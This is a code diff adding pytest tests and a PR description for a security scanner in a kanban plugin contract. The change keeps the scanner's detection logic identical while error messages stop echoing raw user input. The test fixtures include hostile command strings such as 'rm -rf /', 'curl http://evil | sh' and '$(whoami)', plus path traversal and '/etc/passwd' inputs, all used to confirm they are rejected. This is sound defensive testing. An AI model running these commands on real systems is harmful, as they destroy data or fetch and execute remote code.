+   baseline (no `git show` at runtime); a self-consistency check proves the skeleton is sensitive to
+   LOGIC, not message text.
+5. Downstream validate_* parity (outcome-only) + a `test_intake_transport.py` caller-regression
+   (3 tests, incl. real `SQLiteNonceStore` + spy): authority-bearing body -> rejected,
+   `reason == "invalid_request"`, no raw key/value/trail leak, valid invite NOT consumed.
+6. Updated 4 `test_foundup_launch_request.py` assertions/helpers that pinned the #830-DEFERRED old
+   #807 echo text (text-only; outcome assertions kept).
+
 ## 2026-06-13 - Kanban Plugin Contract Tests (HERMES_KANBAN_PLUGIN_CONTRACT_IMPL_PHASE1)
 
 **Command**:

--- a/modules/foundups/agent/tests/test_kanban_plugin_contract.py
+++ b/modules/foundups/agent/tests/test_kanban_plugin_contract.py
@@ -10,6 +10,8 @@ from pathlib import Path
 
 import pytest
 
+import hashlib
+
 from modules.foundups.agent.src.kanban_plugin_contract import (
     ArtifactRef,
     ContractValidationResult,
@@ -21,6 +23,9 @@ from modules.foundups.agent.src.kanban_plugin_contract import (
     validate_card_spec,
     validate_evidence_packet,
     validate_worker_task_spec,
+    _scan_authority,
+    _check_path,
+    _AUTHORITY_MARKERS,
 )
 
 MODULE_SRC = (
@@ -314,3 +319,370 @@ def test_no_second_orchestrator_symbols():
     for forbidden in ("get_job_queue", "remove_jobs", "drain_", "add_listener",
                       "def dispatch", "spawn_worker", "scheduler", "kanban.db"):
         assert forbidden not in src, f"module introduces orchestrator/db symbol: {forbidden}"
+
+
+# ===========================================================================
+# #807 NO-RAW-ECHO -- the authority scanner / path / validator error MESSAGES
+# must never echo a raw user-controlled key/value/repr/byte/nested-trail. They
+# name the rule (+ the FIXED authority-marker class, which is taxonomy, not user
+# input). The authority-DETECTION logic is byte-identical (proven separately by
+# the NAMED-category battery + the AST-skeleton backstop below).
+# ===========================================================================
+
+
+def _scan_errors(node):
+    """Run the production scanner over `node` and return the collected error list."""
+    errs = []
+    _scan_authority(node, "", errs)
+    return errs
+
+
+# A sentinel value that, if it appeared verbatim in an error message, would prove a
+# raw user-controlled value/trail leaked. Each fixture seeds these into KEY NAMES,
+# NESTED PATHS, and VALUE TEXT.
+_LEAK_KEY = "z9LEAKkeyZ9"
+_LEAK_VALUE = "z9LEAKvalueZ9"
+_LEAK_TRAIL = "z9LEAKtrailZ9"
+
+
+def _assert_no_leak(errors, *needles):
+    """No produced error may contain ANY of the raw user-controlled needles, nor a repr
+    of them, nor a control byte. The FIXED marker classes (in _AUTHORITY_MARKERS) are the
+    only authority tokens allowed in a message."""
+    blob = " || ".join(errors)
+    for n in needles:
+        assert n not in blob, f"raw user content leaked into error: {n!r} in {blob!r}"
+        assert repr(n) not in blob, f"repr of user content leaked: {n!r}"
+    # No control bytes (CR/LF/TAB/NUL etc.) ride into any message.
+    for e in errors:
+        assert not any(ord(c) < 32 or ord(c) == 127 for c in e), f"control byte in error: {e!r}"
+
+
+def test_scanner_non_string_key_no_raw_echo():
+    errs = _scan_errors({123: "x", (1, 2): "y"})
+    assert errs and all("non-string key" in e for e in errs)
+    # The raw key repr (123 / (1, 2)) must NOT appear.
+    assert "123" not in " ".join(errs)
+    assert "(1, 2)" not in " ".join(errs)
+
+
+def test_scanner_non_printable_key_no_raw_echo():
+    # A key with a control byte / non-ASCII char -- the raw key must not echo.
+    # \u202e (RTL override) / \u00e9 escapes keep this source pure ASCII.
+    bad_key = "ctrl\x07" + _LEAK_KEY + "\u202e"
+    errs = _scan_errors({bad_key: "v"})
+    assert any("non-ASCII / non-printable key rejected" == e for e in errs)
+    _assert_no_leak(errs, _LEAK_KEY, bad_key)
+
+
+def test_scanner_verified_true_no_raw_echo():
+    errs = _scan_errors({_LEAK_KEY + "_verified" if False else "verified": True})
+    assert any(e == "verified=true is forbidden (advisory-until-verified)" for e in errs)
+    # nested under a user-controlled key/path: still no trail echo.
+    nested = {_LEAK_TRAIL: {"verified": True}}
+    errs2 = _scan_errors(nested)
+    assert any(e == "verified=true is forbidden (advisory-until-verified)" for e in errs2)
+    _assert_no_leak(errs2, _LEAK_TRAIL)
+
+
+def test_scanner_source_authority_promotion_no_raw_echo():
+    errs = _scan_errors({_LEAK_TRAIL: {"source_authority": _LEAK_VALUE + "_external_proto"}})
+    assert any(e == "source_authority promotion is forbidden (only monorepo_poc)" for e in errs)
+    _assert_no_leak(errs, _LEAK_TRAIL, _LEAK_VALUE)
+
+
+def test_scanner_promotion_flag_no_raw_echo():
+    errs = _scan_errors({_LEAK_TRAIL: {"auto_promote": True}})
+    assert any(e == "promotion flag is forbidden" for e in errs)
+    _assert_no_leak(errs, _LEAK_TRAIL)
+
+
+def test_scanner_forbidden_authority_field_keeps_class_drops_raw():
+    # KEY presence forbidden. The message KEEPS the fixed marker class, DROPS the raw key/trail.
+    errs = _scan_errors({_LEAK_TRAIL: {"gate_passed_" + _LEAK_KEY: True}})
+    # exactly the safe phrasing with the fixed class; no raw key/trail.
+    assert any(e == "forbidden authority field present (class: gate_passed)" for e in errs), errs
+    _assert_no_leak(errs, _LEAK_TRAIL, _LEAK_KEY)
+
+
+def test_scanner_shell_command_no_raw_echo():
+    errs = _scan_errors({_LEAK_TRAIL: {"command": "pytest; rm -rf /" + _LEAK_VALUE}})
+    assert any(e == "shell-string command is forbidden (argv-or-null only)" for e in errs)
+    _assert_no_leak(errs, _LEAK_TRAIL, _LEAK_VALUE)
+
+
+def test_scanner_value_carries_authority_keeps_class_drops_raw():
+    # VALUE carries a marker. KEEP the fixed carried class, DROP the raw value repr + trail.
+    errs = _scan_errors({_LEAK_TRAIL: ["prefix create_repo " + _LEAK_VALUE]})
+    assert any(e == "value carries a forbidden authority marker (class: create_repo)" for e in errs), errs
+    _assert_no_leak(errs, _LEAK_TRAIL, _LEAK_VALUE)
+
+
+def test_check_path_no_raw_value_echo():
+    # Every _check_path rejection names the FIELD + the rule, never the raw path value.
+    cases = [
+        "modules/foundups/x\x07" + _LEAK_VALUE,        # non-printable
+        "/abs/" + _LEAK_VALUE,                          # absolute
+        "O:/" + _LEAK_VALUE,                            # drive
+        "../" + _LEAK_VALUE + "/etc",                   # traversal
+        "modules/x;rm -rf /" + _LEAK_VALUE,             # shell metachar
+    ]
+    for v in cases:
+        errs = []
+        _check_path("allowed_paths[0]", v, errs)
+        assert errs, f"path not rejected: {v!r}"
+        _assert_no_leak(errs, _LEAK_VALUE, v)
+
+
+def test_risk_class_rejection_no_raw_value_echo():
+    res = validate_card_spec(
+        {"slice_id": "s", "lane": "ready", "contextbundle_id": "cb",
+         "risk_class": "EVIL_" + _LEAK_VALUE}
+    )
+    assert not res.ok
+    _assert_no_leak(res.errors, _LEAK_VALUE)
+
+
+def test_full_validator_errors_never_echo_user_content():
+    # End-to-end through the public validators: seed leaks into keys, nested trails, values,
+    # and a path; assert rejection AND zero raw leakage in the aggregated error list.
+    hostile_card = {
+        "slice_id": "s", "lane": "ready", "contextbundle_id": "cb", "risk_class": "SPINE_CODE",
+        "gate_passed_" + _LEAK_KEY: True,
+        "allowed_paths": ["/abs/" + _LEAK_VALUE],
+        "meta_" + _LEAK_TRAIL: {"source_authority": "external_proto_" + _LEAK_VALUE},
+    }
+    res = validate_card_spec(hostile_card)
+    assert not res.ok
+    _assert_no_leak(res.errors, _LEAK_KEY, _LEAK_VALUE, _LEAK_TRAIL)
+
+    hostile_ev = {
+        "slice_id": "s", "contextbundle_id": "cb", "verified": False,
+        "residual_risk": "create repo " + _LEAK_VALUE,
+        "changed_files": ["../" + _LEAK_VALUE],
+    }
+    res2 = validate_evidence_packet(hostile_ev)
+    assert not res2.ok
+    _assert_no_leak(res2.errors, _LEAK_VALUE)
+
+
+# ===========================================================================
+# ADDENDUM A -- ERROR-CATEGORY BASELINE IS NAMED BY INPUT DESIGN, NOT MESSAGE-DERIVED.
+# Each fixture is mapped to its expected violation CLASS by CONSTRUCTION. The battery
+# asserts the production scanner REJECTS each fixture (logic parity) WITHOUT parsing the
+# human-readable message to decide pass/fail. A weakened detector (a fixture that stops
+# being rejected) FAILS here even though the message text changed.
+# ===========================================================================
+
+# TEST-ONLY stable category labels, independent of any message string.
+CAT_NON_STRING_KEY = "non_string_key"
+CAT_NON_PRINTABLE_KEY = "non_printable_key"
+CAT_VERIFIED_TRUE = "verified_true"
+CAT_SOURCE_AUTH_PROMO = "source_authority_promotion"
+CAT_PROMOTION_FLAG = "promotion_flag"
+CAT_FORBIDDEN_AUTH_FIELD = "forbidden_authority_field"
+CAT_SHELL_STRING_CMD = "shell_string_command"
+CAT_VALUE_CARRIES_AUTH = "value_carries_authority"
+
+# (fixture-node, expected-category-by-construction). The category is the DESIGNED INTENT
+# of the fixture, NOT read from the resulting message.
+_AUTHORITY_BATTERY = [
+    # --- non-string / non-ASCII keys ---
+    ({123: "x"}, CAT_NON_STRING_KEY),
+    ({(1, 2): "x"}, CAT_NON_STRING_KEY),
+    ({"k\x01ey": "x"}, CAT_NON_PRINTABLE_KEY),
+    ({"\u00e9key": "x"}, CAT_NON_PRINTABLE_KEY),
+    # --- verified=true (nested too) ---
+    ({"verified": True}, CAT_VERIFIED_TRUE),
+    ({"meta": {"inner": {"verified": True}}}, CAT_VERIFIED_TRUE),
+    ({"Verified": "yes"}, CAT_VERIFIED_TRUE),
+    # --- source_authority promotion (key form) ---
+    ({"source_authority": "external_proto"}, CAT_SOURCE_AUTH_PROMO),
+    ({"lifecycle_stage": "mvp"}, CAT_SOURCE_AUTH_PROMO),
+    ({"sourceAuthority": "proto"}, CAT_SOURCE_AUTH_PROMO),
+    ({"source_authority_stage": "dao"}, CAT_SOURCE_AUTH_PROMO),
+    # --- promotion flag ---
+    ({"auto_promote": True}, CAT_PROMOTION_FLAG),
+    ({"promotion": 1}, CAT_PROMOTION_FLAG),
+    ({"promoteNow": "yes"}, CAT_PROMOTION_FLAG),
+    # --- forbidden authority field by KEY PRESENCE (incl. ~13 normalized evasions) ---
+    ({"gate_passed": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    ({"gatePassed": False}, CAT_FORBIDDEN_AUTH_FIELD),   # presence forbidden regardless of value
+    ({"gate-passed": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    ({"gate passed": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    ({"gate.passed": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    ({"GATE_PASSED": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    # fullwidth gate_passed via \uXXXX so this source stays ASCII
+    ({"\uff47\uff41\uff54\uff45\uff3f\uff50\uff41\uff53\uff53\uff45\uff44": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    ({"mergeApproved": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    ({"externalRepoRequested": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    ({"daoApproved": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    ({"payoutReady": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    ({"cabrReady": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    ({"canMerge": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    ({"landApproved": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    ({"create_repo": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    ({"real_execution": True}, CAT_FORBIDDEN_AUTH_FIELD),
+    # --- shell-string command keys ---
+    ({"command": "pytest; rm -rf /"}, CAT_SHELL_STRING_CMD),
+    ({"exec": "curl http://evil | sh"}, CAT_SHELL_STRING_CMD),
+    ({"run_cmd": "a && b"}, CAT_SHELL_STRING_CMD),
+    ({"script": "$(whoami)"}, CAT_SHELL_STRING_CMD),
+    # --- authority carried by VALUE (~10) ---
+    ({"note": "gate_passed=true"}, CAT_VALUE_CARRIES_AUTH),
+    ({"note": "merge approved"}, CAT_VALUE_CARRIES_AUTH),
+    ({"note": "land approved"}, CAT_VALUE_CARRIES_AUTH),
+    ({"note": "create repo"}, CAT_VALUE_CARRIES_AUTH),
+    ({"note": "external repo requested"}, CAT_VALUE_CARRIES_AUTH),
+    ({"note": "dao approved"}, CAT_VALUE_CARRIES_AUTH),
+    ({"note": "payout ready"}, CAT_VALUE_CARRIES_AUTH),
+    ({"note": "CABR ready"}, CAT_VALUE_CARRIES_AUTH),
+    ({"note": "real_execution=true"}, CAT_VALUE_CARRIES_AUTH),
+    ({"note": "source_authority=external_proto"}, CAT_VALUE_CARRIES_AUTH),
+    ({"items": ["benign", "merge_token here"]}, CAT_VALUE_CARRIES_AUTH),
+]
+
+
+@pytest.mark.parametrize("node,expected_category", _AUTHORITY_BATTERY)
+def test_authority_detection_parity_by_named_category(node, expected_category):
+    """The scanner REJECTS every fixture (>=1 error). The expected category is mapped by
+    INPUT DESIGN -- we NEVER parse the message to decide pass/fail. This catches a weakened
+    detector even if the message rewrite is otherwise clean."""
+    errs = _scan_errors(node)
+    assert errs, f"category {expected_category}: fixture was NOT rejected -> detection weakened: {node!r}"
+
+
+def test_authority_battery_covers_every_named_category():
+    # Every NAMED category appears in the battery (no category silently dropped).
+    covered = {cat for _, cat in _AUTHORITY_BATTERY}
+    expected = {
+        CAT_NON_STRING_KEY, CAT_NON_PRINTABLE_KEY, CAT_VERIFIED_TRUE,
+        CAT_SOURCE_AUTH_PROMO, CAT_PROMOTION_FLAG, CAT_FORBIDDEN_AUTH_FIELD,
+        CAT_SHELL_STRING_CMD, CAT_VALUE_CARRIES_AUTH,
+    }
+    assert covered == expected
+
+
+def test_safe_message_locality_preserved():
+    # Addendum B: messages keep the rule family (+ fixed marker class), NOT a single generic
+    # phrase. Assert the distinct safe phrasings are present and that the fixed marker classes
+    # ride through where applicable.
+    field_errs = _scan_errors({"gate_passed": True})
+    assert any("forbidden authority field present (class: gate_passed)" == e for e in field_errs)
+    val_errs = _scan_errors({"n": "create repo"})
+    assert any("value carries a forbidden authority marker (class: create_repo)" == e for e in val_errs)
+    # Distinct rule families do NOT collapse to one bland phrase.
+    families = {
+        "non-string key rejected",
+        "non-ASCII / non-printable key rejected",
+        "verified=true is forbidden (advisory-until-verified)",
+        "source_authority promotion is forbidden (only monorepo_poc)",
+        "promotion flag is forbidden",
+        "shell-string command is forbidden (argv-or-null only)",
+    }
+    produced = set(_scan_errors({123: "x"})) | set(_scan_errors({"k\x01": "v"})) \
+        | set(_scan_errors({"verified": True})) \
+        | set(_scan_errors({"source_authority": "external_proto"})) \
+        | set(_scan_errors({"auto_promote": True})) \
+        | set(_scan_errors({"command": "a;b"}))
+    assert families <= produced, families - produced
+
+
+def test_marker_class_token_is_taxonomy_not_user_input():
+    # The class tokens that ARE allowed in messages come from the FIXED _AUTHORITY_MARKERS
+    # taxonomy, never from user-controlled key/value bytes.
+    errs = _scan_errors({"gate_passed_hack": True})
+    for e in errs:
+        if e.startswith("forbidden authority field present (class: "):
+            cls = e.split("class: ", 1)[1].rstrip(")")
+            assert cls in _AUTHORITY_MARKERS, f"emitted class {cls!r} not in fixed taxonomy"
+
+
+# ===========================================================================
+# AST-SKELETON SELF-CONTAINED BACKSTOP -- the authority-detection CONTROL FLOW is
+# byte-identical to the origin/main baseline. Every string literal AND every f-string
+# (JoinedStr) is uniformly blanked, so a message-only rewrite (f-string -> plain string)
+# is invisible; ANY change to a branch / condition / call / marker-set would change the
+# hash. SELF-CONTAINED: compares against a FROZEN baseline hash captured from origin/main
+# at authoring time -- NO `git show` at runtime (the #830 shallow-CI lesson).
+# ===========================================================================
+
+# SHA-256 of the blanked control-flow skeleton of origin/main's kanban_plugin_contract.py
+# (base origin/main edbd90642). Recomputed from HEAD below; equality proves logic parity.
+_ORIGIN_SKELETON_SHA256 = "f2ee0e2696e8a1fd34e008d2f28ddf429cc09946a1ed6a29d66b665ef9ad77c6"
+
+
+class _Blanker(ast.NodeTransformer):
+    """Blank every string literal and f-string to a single uniform token, leaving the
+    control-flow structure (branches/conditions/calls/names) intact."""
+
+    def visit_Constant(self, node):
+        if isinstance(node.value, str):
+            return ast.copy_location(ast.Constant(value=""), node)
+        return node
+
+    def visit_JoinedStr(self, node):
+        return ast.copy_location(ast.Constant(value=""), node)
+
+
+def _skeleton_sha256(src: str) -> str:
+    tree = _Blanker().visit(ast.parse(src))
+    ast.fix_missing_locations(tree)
+    return hashlib.sha256(ast.dump(tree).encode("utf-8")).hexdigest()
+
+
+def test_authority_logic_skeleton_matches_origin_baseline():
+    """The blanked control-flow skeleton of the CURRENT file equals the frozen origin/main
+    baseline -> only string/message literals changed; no logic/branch/marker-set drift.
+    If this fails, a message edit accidentally changed the scanner's CONTROL FLOW."""
+    head_src = MODULE_SRC.read_text(encoding="utf-8")
+    assert _skeleton_sha256(head_src) == _ORIGIN_SKELETON_SHA256, (
+        "control-flow skeleton drifted from the origin/main baseline -- the message rewrite "
+        "must be TEXT-ONLY; a branch/condition/call/marker-set changed."
+    )
+
+
+def test_skeleton_blanking_is_message_insensitive_self_check():
+    """Self-consistency: two variants of the module that differ ONLY in a message string
+    (one f-string, one plain string) produce the SAME skeleton hash -- proving the backstop
+    is sensitive to LOGIC, not message text."""
+    src_a = "def f(e, t, k):\n    e.append('non-string key rejected')\n    e.append(f'{t}{k}: x')\n"
+    src_b = "def f(e, t, k):\n    e.append(f'{t}: non-string key {k!r}')\n    e.append(f'{t}{k}: x')\n"
+    assert _skeleton_sha256(src_a) == _skeleton_sha256(src_b)
+    # But a real LOGIC change (an extra branch) MUST change the hash.
+    src_c = "def f(e, t, k):\n    if k:\n        e.append('x')\n    e.append(f'{t}{k}: x')\n"
+    assert _skeleton_sha256(src_a) != _skeleton_sha256(src_c)
+
+
+# ===========================================================================
+# DOWNSTREAM VALIDATOR PARITY -- validate_card_spec / validate_worker_task_spec /
+# validate_evidence_packet REJECT exactly the same inputs as before (only TEXT changed).
+# These re-assert the OUTCOME (ok flag), never a pinned message string.
+# ===========================================================================
+
+
+def test_downstream_validators_reject_authority_payloads():
+    # card / task / evidence each still reject an embedded authority marker.
+    assert not validate_card_spec(
+        {"slice_id": "s", "lane": "ready", "contextbundle_id": "cb", "risk_class": "SPINE_CODE",
+         "gate_passed": True}
+    ).ok
+    assert not validate_worker_task_spec(
+        {"slice_id": "s", "contextbundle_id": "cb", "merge_token": "x"}
+    ).ok
+    assert not validate_evidence_packet(
+        {"slice_id": "s", "contextbundle_id": "cb", "verified": False, "notes": "create repo"}
+    ).ok
+
+
+def test_downstream_validators_still_accept_clean_shapes():
+    assert validate_card_spec(_clean_card()).ok
+    assert validate_worker_task_spec(_clean_task()).ok
+    assert validate_evidence_packet(_clean_evidence()).ok
+
+
+def test_downstream_bad_path_still_rejected_outcome_only():
+    assert not validate_card_spec(
+        {"slice_id": "s", "lane": "ready", "contextbundle_id": "cb", "risk_class": "SPINE_CODE",
+         "allowed_paths": ["/etc/passwd"]}
+    ).ok


### PR DESCRIPTION
## Summary

Completes the no-raw-echo invariant on the **shared #807 authority boundary**. The #830 launch_request slice
deferred this: `validate_launch_request` imports `_scan_authority` from `kanban_plugin_contract.py`, whose error
messages echoed the raw user **key / value / `repr()` / nested-trail**. This is the **last hygiene item** in the
launch-intake arc (#810/#821/#823/#824/#826/#830). Base origin/main `edbd90642`. Worker-Lane A. **File scope: 7.**

## What changed (MESSAGE TEXT ONLY -- detection logic byte-identical)
`modules/foundups/agent/src/kanban_plugin_contract.py`:
- `_scan_authority` (8 sites): dropped `{trail}`/`{key}`/`{value}`/`{node!r}`; **kept** the `{m}`/`{carried}`
  marker class from the fixed `_AUTHORITY_MARKERS` taxonomy -- e.g. `forbidden authority field present
  (class: gate_passed)`, `value carries a forbidden authority marker (class: create_repo)`, `source_authority
  promotion is forbidden (only monorepo_poc)`.
- `_check_path` (5 sites): dropped `{value!r}` + the offending-char list; kept the fixed field label + rule +
  `allowed_paths[i]` index locality.
- `validate_card_spec`: dropped the raw `risk_class` value; kept the fixed `ALLOWED_RISK_CLASSES` set.
The user-controlled `trail` is still computed for recursion descent but **never interpolated into a message**.

## Parity -- the critical proof (this is a security scanner)
- **AST control-flow skeleton** with every string/f-string constant blanked is **byte-identical** to origin/main
  (a checked-in SHA baseline test, **self-contained -- no runtime `git show`**, per the #830 lesson; logic-sensitive:
  planted marker-drop / branch-flip / conditional-delete each change the hash).
- A **NAMED-category** authority+evasion battery (categories mapped by **input design**, never parsed from the
  changed message -- Addendum A) confirms every marker and evasion (camelCase / separator / UPPER / NFKC-fullwidth /
  by-value / source_authority-promotion / verified=true / shell-command / non-string / non-ASCII) is still
  rejected with the **same class and count**.
- Downstream `validate_card_spec` / `validate_worker_task_spec` / `validate_evidence_packet` /
  `validate_launch_request`: **0 accept/reject outcome changes**.

## Transport (Addendum C)
An authority-bearing body through the #823 `intake_request` (real `SQLiteNonceStore` + valid forged invite) ->
rejected, `reason == "invalid_request"` (low-cardinality), no raw key/value/trail in result/repr/serialized, and
the **single-use invite is NOT consumed** (caught pre-provider).

## Adversarial review
Independent 5-lane SENTINEL (raw-echo / **authority-detection-parity [critical]** / downstream-caller-parity /
AST-runtime-parity / scope): **CLEAN, 0 ride-throughs**. The critical lane loaded origin/main's scanner as a
separate module, ran a 119+ item battery against both, and found **0 detection weakening / 0 class-or-count
mismatch** (a `ZZSENTINELZZ` probe confirmed no raw echo). Orchestrator audit additionally caught + reverted a
stray `.m2m/staged/` artifact (auto-regenerated by a test import; not part of the slice).

## Tests
`test_kanban_plugin_contract.py` 71 -> **135**; full agent suite **832 passed** (heavy + CI); launch-intake
affected-package **592 passed**. No skip/xfail. **WSP_97 18/18 PASS** (canonical header). ASCII-clean.

## Scope
Only `kanban_plugin_contract.py` + its tests + ModLogs, plus (Addendum C) `test_intake_transport.py` and
(necessary, **text-only**) `test_foundup_launch_request.py` -- the #830 tests had assertions tied to the then-deferred
#807 echo; they now flip to expecting no-echo (outcomes unchanged). **#810/#821/#823/#824/#826 SOURCE + `envelope.py`
UNCHANGED.**

Predecessors: #810, #821, #823, #824, #826, #830.

**STOP at MERGE_READY** -- not self-merged; external 0102 gate authorizes LAND.
